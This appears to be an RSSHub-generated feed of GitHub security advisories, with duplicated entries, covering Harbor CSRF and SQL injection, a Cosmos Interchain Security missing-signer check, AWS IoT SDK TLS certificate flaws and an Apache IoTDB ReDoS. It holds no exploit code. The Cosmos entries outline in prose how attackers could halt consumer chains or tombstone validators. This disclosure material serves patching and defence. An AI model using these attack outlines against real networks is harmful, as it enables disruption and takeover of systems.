<p>The vulnerability was immediately fixed by the Harbor team and all supported versions were patched.</p>
<p>Successful exploitation of this issue will lead to 3rd parties executing actions on the platform on behalf of authenticated users and administrators.</p>
<p>If your product uses the affected releases of Harbor, update to version 1.8.6 and 1.9.3 to patch this issue immediately.</p>
<p><a href="https://github.com/goharbor/harbor/releases/tag/v1.8.6">https://github.com/goharbor/harbor/releases/tag/v1.8.6</a>
<a href="https://github.com/goharbor/harbor/releases/tag/v1.9.3">https://github.com/goharbor/harbor/releases/tag/v1.9.3</a></p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/goharbor/harbor/security/advisories/GHSA-gcqm-v682-ccw6">https://github.com/goharbor/harbor/security/advisories/GHSA-gcqm-v682-ccw6</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-19025">https://nvd.nist.gov/vuln/detail/CVE-2019-19025</a></li>
<li><a href="https://github.com/goharbor/harbor/security/advisories">https://github.com/goharbor/harbor/security/advisories</a></li>
<li><a href="https://tanzu.vmware.com/security/cve-2019-19025">https://tanzu.vmware.com/security/cve-2019-19025</a></li>
<li><a href="https://github.com/advisories/GHSA-rffr-c932-cpxv">https://github.com/advisories/GHSA-rffr-c932-cpxv</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-rffr-c932-cpxv</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-rffr-c932-cpxv</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/goharbor/harbor] SQL Injection in Cloud Native Computing Foundation Harbor</title>
<description><p>Cloud Native Computing Foundation Harbor prior to 1.8.6 and 1.9.3 allows SQL Injection via user-groups in the VMware Harbor Container Registry for the Pivotal Platform.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/goharbor/harbor/security/advisories/GHSA-qcfv-8v29-469w">https://github.com/goharbor/harbor/security/advisories/GHSA-qcfv-8v29-469w</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-19029">https://nvd.nist.gov/vuln/detail/CVE-2019-19029</a></li>
<li><a href="https://github.com/goharbor/harbor/security/advisories">https://github.com/goharbor/harbor/security/advisories</a></li>
<li><a href="https://tanzu.vmware.com/security/cve-2019-19029">https://tanzu.vmware.com/security/cve-2019-19029</a></li>
<li><a href="https://pkg.go.dev/vuln/GO-2022-0853">https://pkg.go.dev/vuln/GO-2022-0853</a></li>
<li><a href="https://github.com/advisories/GHSA-jr34-mff8-pc6f">https://github.com/advisories/GHSA-jr34-mff8-pc6f</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-jr34-mff8-pc6f</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-jr34-mff8-pc6f</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/goharbor/harbor] SQL Injection in Cloud Native Computing Foundation Harbor</title>
<description><p>Cloud Native Computing Foundation Harbor prior to 1.8.6 and 1.9.3 allows SQL Injection via user-groups in the VMware Harbor Container Registry for the Pivotal Platform.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/goharbor/harbor/security/advisories/GHSA-qcfv-8v29-469w">https://github.com/goharbor/harbor/security/advisories/GHSA-qcfv-8v29-469w</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-19029">https://nvd.nist.gov/vuln/detail/CVE-2019-19029</a></li>
<li><a href="https://github.com/goharbor/harbor/security/advisories">https://github.com/goharbor/harbor/security/advisories</a></li>
<li><a href="https://tanzu.vmware.com/security/cve-2019-19029">https://tanzu.vmware.com/security/cve-2019-19029</a></li>
<li><a href="https://pkg.go.dev/vuln/GO-2022-0853">https://pkg.go.dev/vuln/GO-2022-0853</a></li>
<li><a href="https://github.com/advisories/GHSA-jr34-mff8-pc6f">https://github.com/advisories/GHSA-jr34-mff8-pc6f</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-jr34-mff8-pc6f</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-jr34-mff8-pc6f</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/cosmos/interchain-security/v4] Interchain Security: The signers of ICS messages do not need to match the provider address</title>
<description><h3 id="context">Context</h3>
<p>ICS has the following four messages that enable validators on the provider chain to perform different actions:</p>
<ul>
<li><code>MsgOptIn</code> -- adds a validator to the consumer chain’s active set</li>
<li><code>MsgOptOut</code> -- removes a validator from the consumer chain’s active set </li>
<li><code>MsgAssignConsumerKey</code> -- changes the consensus key used for a validator’s operations on a consumer chain</li>
<li><code>MsgSetConsumerCommissionRate</code> -- sets a validator’s consumer-specific commission rate</li>
</ul>
<p>Normally, only the respective validators are allowed to perform these actions. </p>
<h3 id="issue">Issue</h3>
<p>The upgrade to SDK 0.50, introduced a <a href="https://docs.cosmos.network/v0.50/build/building-modules/protobuf-annotations#signer">signer</a> field to these messages. This field is used to authenticate the user sending the message to the system. However, there was no validation on the ICS side to check if the signer matches the provider address. </p>
<p>As a result, any user could opt-in, opt-out, change the commission rate, or change what public key a validator uses on a consumer chain. </p>
<p>For more context, check out the code:</p>
<ul>
<li>proto files <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/proto/interchain_security/ccv/provider/v1/tx.proto#L52">https://github.com/cosmos/interchain-security/blob/v5.1.1/proto/interchain_security/ccv/provider/v1/tx.proto#L52</a></li>
<li>message validation <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/types/msg.go#L106">https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/types/msg.go#L106</a></li>
<li>message handling <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/keeper/msg_server.go#L52">https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/keeper/msg_server.go#L52</a></li>
</ul>
<h3 id="severity-assessment">Severity assessment</h3>
<p>The severity assessment is based on <a href="https://github.com/interchainio/security/blob/main/resources/CLASSIFICATION_MATRIX.md">this framework</a>. </p>
<p><strong>Potential impact:</strong> Catastrophic </p>
<ul>
<li>By changing consumer keys for 1/3+ of a consumer chain's validator set, any user could cause a consumer chain to halt. Given that the consumer is down, the provider will jail provider validators for consumer downtime, so this exploit would not have impacted the provider directly. Consumer chain halts would need to be addressed by a provider-side patch.</li>
<li>By changing consumer keys on a consumer node, double signing, and submitting evidence back to the provider, any user could tombstone any provider validator. This would cause the provider's active set to change. At scale, this exploit could be applied to all active provider validators and a well-funded attacker could then run their own nodes and take over consensus on the provider and on consumer chains.</li>
</ul>
<p><strong>Likelihood:</strong> Rare</p>
<ul>
<li>The bug was discovered internally. There is no evidence that any external party has identified this vulnerability. </li>
<li>The bug has been live for two weeks with no issues. </li>
<li>All four message types are ones that only validators use, and rarely use in daily operations.</li>
<li>In the Cosmos Hub’s recent history (May - Aug), there has been only one instance of any of these message types, which was performed in accordance with chain rules.</li>
<li>The catastrophic exploits (such as tombstoning the entire validator set of the provider) are also extremely complex. They involve several operations that are not well-understood by many people, and the entire exploit must occur quickly and at-scale to avoid other node operators responding defensively.</li>
</ul>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/cosmos/interchain-security/security/advisories/GHSA-7q74-g774-7x3g">https://github.com/cosmos/interchain-security/security/advisories/GHSA-7q74-g774-7x3g</a></li>
<li><a href="https://github.com/advisories/GHSA-7q74-g774-7x3g">https://github.com/advisories/GHSA-7q74-g774-7x3g</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-7q74-g774-7x3g</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-7q74-g774-7x3g</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/cosmos/interchain-security/v3] Interchain Security: The signers of ICS messages do not need to match the provider address</title>
<description><h3 id="context">Context</h3>
<p>ICS has the following four messages that enable validators on the provider chain to perform different actions:</p>
<ul>
<li><code>MsgOptIn</code> -- adds a validator to the consumer chain’s active set</li>
<li><code>MsgOptOut</code> -- removes a validator from the consumer chain’s active set </li>
<li><code>MsgAssignConsumerKey</code> -- changes the consensus key used for a validator’s operations on a consumer chain</li>
<li><code>MsgSetConsumerCommissionRate</code> -- sets a validator’s consumer-specific commission rate</li>
</ul>
<p>Normally, only the respective validators are allowed to perform these actions. </p>
<h3 id="issue">Issue</h3>
<p>The upgrade to SDK 0.50, introduced a <a href="https://docs.cosmos.network/v0.50/build/building-modules/protobuf-annotations#signer">signer</a> field to these messages. This field is used to authenticate the user sending the message to the system. However, there was no validation on the ICS side to check if the signer matches the provider address. </p>
<p>As a result, any user could opt-in, opt-out, change the commission rate, or change what public key a validator uses on a consumer chain. </p>
<p>For more context, check out the code:</p>
<ul>
<li>proto files <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/proto/interchain_security/ccv/provider/v1/tx.proto#L52">https://github.com/cosmos/interchain-security/blob/v5.1.1/proto/interchain_security/ccv/provider/v1/tx.proto#L52</a></li>
<li>message validation <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/types/msg.go#L106">https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/types/msg.go#L106</a></li>
<li>message handling <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/keeper/msg_server.go#L52">https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/keeper/msg_server.go#L52</a></li>
</ul>
<h3 id="severity-assessment">Severity assessment</h3>
<p>The severity assessment is based on <a href="https://github.com/interchainio/security/blob/main/resources/CLASSIFICATION_MATRIX.md">this framework</a>. </p>
<p><strong>Potential impact:</strong> Catastrophic </p>
<ul>
<li>By changing consumer keys for 1/3+ of a consumer chain's validator set, any user could cause a consumer chain to halt. Given that the consumer is down, the provider will jail provider validators for consumer downtime, so this exploit would not have impacted the provider directly. Consumer chain halts would need to be addressed by a provider-side patch.</li>
<li>By changing consumer keys on a consumer node, double signing, and submitting evidence back to the provider, any user could tombstone any provider validator. This would cause the provider's active set to change. At scale, this exploit could be applied to all active provider validators and a well-funded attacker could then run their own nodes and take over consensus on the provider and on consumer chains.</li>
</ul>
<p><strong>Likelihood:</strong> Rare</p>
<ul>
<li>The bug was discovered internally. There is no evidence that any external party has identified this vulnerability. </li>
<li>The bug has been live for two weeks with no issues. </li>
<li>All four message types are ones that only validators use, and rarely use in daily operations.</li>
<li>In the Cosmos Hub’s recent history (May - Aug), there has been only one instance of any of these message types, which was performed in accordance with chain rules.</li>
<li>The catastrophic exploits (such as tombstoning the entire validator set of the provider) are also extremely complex. They involve several operations that are not well-understood by many people, and the entire exploit must occur quickly and at-scale to avoid other node operators responding defensively.</li>
</ul>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/cosmos/interchain-security/security/advisories/GHSA-7q74-g774-7x3g">https://github.com/cosmos/interchain-security/security/advisories/GHSA-7q74-g774-7x3g</a></li>
<li><a href="https://github.com/advisories/GHSA-7q74-g774-7x3g">https://github.com/advisories/GHSA-7q74-g774-7x3g</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-7q74-g774-7x3g</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-7q74-g774-7x3g</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/cosmos/interchain-security/v2] Interchain Security: The signers of ICS messages do not need to match the provider address</title>
<description><h3 id="context">Context</h3>
<p>ICS has the following four messages that enable validators on the provider chain to perform different actions:</p>
<ul>
<li><code>MsgOptIn</code> -- adds a validator to the consumer chain’s active set</li>
<li><code>MsgOptOut</code> -- removes a validator from the consumer chain’s active set </li>
<li><code>MsgAssignConsumerKey</code> -- changes the consensus key used for a validator’s operations on a consumer chain</li>
<li><code>MsgSetConsumerCommissionRate</code> -- sets a validator’s consumer-specific commission rate</li>
</ul>
<p>Normally, only the respective validators are allowed to perform these actions. </p>
<h3 id="issue">Issue</h3>
<p>The upgrade to SDK 0.50, introduced a <a href="https://docs.cosmos.network/v0.50/build/building-modules/protobuf-annotations#signer">signer</a> field to these messages. This field is used to authenticate the user sending the message to the system. However, there was no validation on the ICS side to check if the signer matches the provider address. </p>
<p>As a result, any user could opt-in, opt-out, change the commission rate, or change what public key a validator uses on a consumer chain. </p>
<p>For more context, check out the code:</p>
<ul>
<li>proto files <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/proto/interchain_security/ccv/provider/v1/tx.proto#L52">https://github.com/cosmos/interchain-security/blob/v5.1.1/proto/interchain_security/ccv/provider/v1/tx.proto#L52</a></li>
<li>message validation <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/types/msg.go#L106">https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/types/msg.go#L106</a></li>
<li>message handling <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/keeper/msg_server.go#L52">https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/keeper/msg_server.go#L52</a></li>
</ul>
<h3 id="severity-assessment">Severity assessment</h3>
<p>The severity assessment is based on <a href="https://github.com/interchainio/security/blob/main/resources/CLASSIFICATION_MATRIX.md">this framework</a>. </p>
<p><strong>Potential impact:</strong> Catastrophic </p>
<ul>
<li>By changing consumer keys for 1/3+ of a consumer chain's validator set, any user could cause a consumer chain to halt. Given that the consumer is down, the provider will jail provider validators for consumer downtime, so this exploit would not have impacted the provider directly. Consumer chain halts would need to be addressed by a provider-side patch.</li>
<li>By changing consumer keys on a consumer node, double signing, and submitting evidence back to the provider, any user could tombstone any provider validator. This would cause the provider's active set to change. At scale, this exploit could be applied to all active provider validators and a well-funded attacker could then run their own nodes and take over consensus on the provider and on consumer chains.</li>
</ul>
<p><strong>Likelihood:</strong> Rare</p>
<ul>
<li>The bug was discovered internally. There is no evidence that any external party has identified this vulnerability. </li>
<li>The bug has been live for two weeks with no issues. </li>
<li>All four message types are ones that only validators use, and rarely use in daily operations.</li>
<li>In the Cosmos Hub’s recent history (May - Aug), there has been only one instance of any of these message types, which was performed in accordance with chain rules.</li>
<li>The catastrophic exploits (such as tombstoning the entire validator set of the provider) are also extremely complex. They involve several operations that are not well-understood by many people, and the entire exploit must occur quickly and at-scale to avoid other node operators responding defensively.</li>
</ul>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/cosmos/interchain-security/security/advisories/GHSA-7q74-g774-7x3g">https://github.com/cosmos/interchain-security/security/advisories/GHSA-7q74-g774-7x3g</a></li>
<li><a href="https://github.com/advisories/GHSA-7q74-g774-7x3g">https://github.com/advisories/GHSA-7q74-g774-7x3g</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-7q74-g774-7x3g</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-7q74-g774-7x3g</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/cosmos/interchain-security] Interchain Security: The signers of ICS messages do not need to match the provider address</title>
<description><h3 id="context">Context</h3>
<p>ICS has the following four messages that enable validators on the provider chain to perform different actions:</p>
<ul>
<li><code>MsgOptIn</code> -- adds a validator to the consumer chain’s active set</li>
<li><code>MsgOptOut</code> -- removes a validator from the consumer chain’s active set </li>
<li><code>MsgAssignConsumerKey</code> -- changes the consensus key used for a validator’s operations on a consumer chain</li>
<li><code>MsgSetConsumerCommissionRate</code> -- sets a validator’s consumer-specific commission rate</li>
</ul>
<p>Normally, only the respective validators are allowed to perform these actions. </p>
<h3 id="issue">Issue</h3>
<p>The upgrade to SDK 0.50, introduced a <a href="https://docs.cosmos.network/v0.50/build/building-modules/protobuf-annotations#signer">signer</a> field to these messages. This field is used to authenticate the user sending the message to the system. However, there was no validation on the ICS side to check if the signer matches the provider address. </p>
<p>As a result, any user could opt-in, opt-out, change the commission rate, or change what public key a validator uses on a consumer chain. </p>
<p>For more context, check out the code:</p>
<ul>
<li>proto files <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/proto/interchain_security/ccv/provider/v1/tx.proto#L52">https://github.com/cosmos/interchain-security/blob/v5.1.1/proto/interchain_security/ccv/provider/v1/tx.proto#L52</a></li>
<li>message validation <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/types/msg.go#L106">https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/types/msg.go#L106</a></li>
<li>message handling <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/keeper/msg_server.go#L52">https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/keeper/msg_server.go#L52</a></li>
</ul>
<h3 id="severity-assessment">Severity assessment</h3>
<p>The severity assessment is based on <a href="https://github.com/interchainio/security/blob/main/resources/CLASSIFICATION_MATRIX.md">this framework</a>. </p>
<p><strong>Potential impact:</strong> Catastrophic </p>
<ul>
... |
http://localhost:1200/github-advisor/data/maven - Success ✔️<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0">
<channel>
<title>GitHub Advisory Database RSS - maven</title>
<link>https://github.com/advisories</link>
<atom:link href="http://localhost:1200/github-advisor/data/maven" rel="self" type="application/rss+xml"></atom:link>
<description>GitHub Advisory Database RSS - maven - Powered by RSSHub</description>
<generator>RSSHub</generator>
<webMaster>contact@rsshub.app (RSSHub)</webMaster>
<language>en</language>
<lastBuildDate>Fri, 13 Sep 2024 16:32:37 GMT</lastBuildDate>
<ttl>5</ttl>
<item>
<title>[software.amazon.awssdk.iotdevicesdk:aws-iot-device-sdk] Improper certificate management in AWS IoT Device SDK v2</title>
<description><p>Connections initialized by the AWS IoT Device SDK v2 for Java (versions prior to 1.3.3), Python (versions prior to 1.5.18), C++ (versions prior to 1.12.7) and Node.js (versions prior to 1.5.1) did not verify server certificate hostname during TLS handshake when overriding Certificate Authorities (CA) in their trust stores on Windows. This issue has been addressed in aws-c-io submodule versions 0.9.13 onward. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.3.3 on Microsoft Windows. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.5.18 on Microsoft Windows. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.12.7 on Microsoft Windows. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.5.3 on Microsoft Windows.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-40828">https://nvd.nist.gov/vuln/detail/CVE-2021-40828</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2/commit/67950ad2a02f2f9355c310b69dc9226b017f32f2">https://github.com/aws/aws-iot-device-sdk-java-v2/commit/67950ad2a02f2f9355c310b69dc9226b017f32f2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2/commit/4be41394f1aee979e6f4b012fcb01eecabd0c08d">https://github.com/aws/aws-iot-device-sdk-js-v2/commit/4be41394f1aee979e6f4b012fcb01eecabd0c08d</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2/commit/fd4c0ba04b35eab9e20c635af5548fcc5a92d8be">https://github.com/aws/aws-iot-device-sdk-python-v2/commit/fd4c0ba04b35eab9e20c635af5548fcc5a92d8be</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-cpp-v2">https://github.com/aws/aws-iot-device-sdk-cpp-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2">https://github.com/aws/aws-iot-device-sdk-java-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2">https://github.com/aws/aws-iot-device-sdk-js-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2">https://github.com/aws/aws-iot-device-sdk-python-v2</a></li>
<li><a href="https://github.com/advisories/GHSA-94jq-q5v2-76wj">https://github.com/advisories/GHSA-94jq-q5v2-76wj</a></li>
<li><a href="https://github.com/awslabs/aws-c-io">https://github.com/awslabs/aws-c-io</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-861.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-861.yaml</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-94jq-q5v2-76wj</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-94jq-q5v2-76wj</guid>
<author>GitHub</author>
</item>
<item>
<title>[software.amazon.awssdk.iotdevicesdk:aws-iot-device-sdk] Improper certificate management in AWS IoT Device SDK v2</title>
<description><p>The AWS IoT Device SDK v2 for Java, Python, C++ and Node.js appends a user supplied Certificate Authority (CA) to the root CAs instead of overriding it on Unix systems. TLS handshakes will thus succeed if the peer can be verified either from the user-supplied CA or the system’s default trust-store. Attackers with access to a host’s trust stores or are able to compromise a certificate authority already in the host's trust store (note: the attacker must also be able to spoof DNS in this case) may be able to use this issue to bypass CA pinning. An attacker could then spoof the MQTT broker, and either drop traffic and/or respond with the attacker's data, but they would not be able to forward this data on to the MQTT broker because the attacker would still need the user's private keys to authenticate against the MQTT broker. The 'aws_tls_ctx_options_override_default_trust_store_*' function within the aws-c-io submodule has been updated to override the default trust store. This corrects this issue. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.5.0 on Linux/Unix. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.6.1 on Linux/Unix. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.12.7 on Linux/Unix. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.5.3 on Linux/Unix. Amazon Web Services AWS-C-IO 0.10.4 on Linux/Unix.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-40830">https://nvd.nist.gov/vuln/detail/CVE-2021-40830</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2/commit/67950ad2a02f2f9355c310b69dc9226b017f32f2">https://github.com/aws/aws-iot-device-sdk-java-v2/commit/67950ad2a02f2f9355c310b69dc9226b017f32f2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2/commit/53a36e3ac203291494120604d416b6de59177cac">https://github.com/aws/aws-iot-device-sdk-js-v2/commit/53a36e3ac203291494120604d416b6de59177cac</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2/commit/0450ce68add7e3d05c6d781ecdac953c299c053a">https://github.com/aws/aws-iot-device-sdk-python-v2/commit/0450ce68add7e3d05c6d781ecdac953c299c053a</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-cpp-v2">https://github.com/aws/aws-iot-device-sdk-cpp-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2">https://github.com/aws/aws-iot-device-sdk-java-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2">https://github.com/aws/aws-iot-device-sdk-js-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2">https://github.com/aws/aws-iot-device-sdk-python-v2</a></li>
<li><a href="https://github.com/advisories/GHSA-c4rh-4376-gff4">https://github.com/advisories/GHSA-c4rh-4376-gff4</a></li>
<li><a href="https://github.com/awslabs/aws-c-io">https://github.com/awslabs/aws-c-io</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-863.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-863.yaml</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-c4rh-4376-gff4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-c4rh-4376-gff4</guid>
<author>GitHub</author>
</item>
<item>
<title>[software.amazon.awssdk.iotdevicesdk:aws-iot-device-sdk] Improper certificate management in AWS IoT Device SDK v2</title>
<description><p>The AWS IoT Device SDK v2 for Java, Python, C++ and Node.js appends a user supplied Certificate Authority (CA) to the root CAs instead of overriding it on macOS systems. Additionally, SNI validation is also not enabled when the CA has been "overridden". TLS handshakes will thus succeed if the peer can be verified either from the user-supplied CA or the system’s default trust-store. Attackers with access to a host’s trust stores or are able to compromise a certificate authority already in the host's trust store (note: the attacker must also be able to spoof DNS in this case) may be able to use this issue to bypass CA pinning. An attacker could then spoof the MQTT broker, and either drop traffic and/or respond with the attacker's data, but they would not be able to forward this data on to the MQTT broker because the attacker would still need the user's private keys to authenticate against the MQTT broker. The <code>aws_tls_ctx_options_override_default_trust_store_*</code> function within the aws-c-io submodule has been updated to address this behavior. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.5.0 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.7.0 on macOS. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.14.0 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.6.0 on macOS. Amazon Web Services AWS-C-IO 0.10.7 on macOS.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-40831">https://nvd.nist.gov/vuln/detail/CVE-2021-40831</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2/commit/46375e9b1bfb34109b9ff3b1eff9c770f9daa186">https://github.com/aws/aws-iot-device-sdk-java-v2/commit/46375e9b1bfb34109b9ff3b1eff9c770f9daa186</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2/commit/22f1989f5bdb0bdd9c912a5a2d255ee6c0854f68">https://github.com/aws/aws-iot-device-sdk-js-v2/commit/22f1989f5bdb0bdd9c912a5a2d255ee6c0854f68</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2/commit/5aef82573202309063eb540b72cee0e565f85a2d">https://github.com/aws/aws-iot-device-sdk-python-v2/commit/5aef82573202309063eb540b72cee0e565f85a2d</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-cpp-v2">https://github.com/aws/aws-iot-device-sdk-cpp-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2">https://github.com/aws/aws-iot-device-sdk-java-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2">https://github.com/aws/aws-iot-device-sdk-js-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2">https://github.com/aws/aws-iot-device-sdk-python-v2</a></li>
<li><a href="https://github.com/advisories/GHSA-j3f7-7rmc-6wqj">https://github.com/advisories/GHSA-j3f7-7rmc-6wqj</a></li>
<li><a href="https://github.com/awslabs/aws-c-io">https://github.com/awslabs/aws-c-io</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-864.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-864.yaml</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-j3f7-7rmc-6wqj</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-j3f7-7rmc-6wqj</guid>
<author>GitHub</author>
</item>
<item>
<title>[software.amazon.awssdk.iotdevicesdk:aws-iot-device-sdk] Improper certificate management in AWS IoT Device SDK v2</title>
<description><p>Connections initialized by the AWS IoT Device SDK v2 for Java (versions prior to 1.4.2), Python (versions prior to 1.6.1), C++ (versions prior to 1.12.7) and Node.js (versions prior to 1.5.3) did not verify server certificate hostname during TLS handshake when overriding Certificate Authorities (CA) in their trust stores on MacOS. This issue has been addressed in aws-c-io submodule versions 0.10.5 onward. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.4.2 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.6.1 on macOS. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.12.7 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.5.3 on macOS. Amazon Web Services AWS-C-IO 0.10.4 on macOS.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-40829">https://nvd.nist.gov/vuln/detail/CVE-2021-40829</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2/commits/v1.4.2">https://github.com/aws/aws-iot-device-sdk-java-v2/commits/v1.4.2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-cpp-v2">https://github.com/aws/aws-iot-device-sdk-cpp-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2">https://github.com/aws/aws-iot-device-sdk-java-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2">https://github.com/aws/aws-iot-device-sdk-js-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2">https://github.com/aws/aws-iot-device-sdk-python-v2</a></li>
<li><a href="https://github.com/advisories/GHSA-743r-5g92-5vgf">https://github.com/advisories/GHSA-743r-5g92-5vgf</a></li>
<li><a href="https://github.com/awslabs/aws-c-io">https://github.com/awslabs/aws-c-io</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-862.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-862.yaml</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-743r-5g92-5vgf</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-743r-5g92-5vgf</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.apache.iotdb:tsfile] Apache IoTDB subject to ReDOS with Java 8</title>
<description><p>Apache IoTDB versions 0.12.2 through 0.12.6, and 0.13.0 through 0.13.2 are vulnerable to a Denial of Service attack when accepting untrusted patterns for REGEXP queries with Java 8. This issue is patched in 0.13.3. Users should upgrade or use a later version of Java to avoid it.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2022-43766">https://nvd.nist.gov/vuln/detail/CVE-2022-43766</a></li>
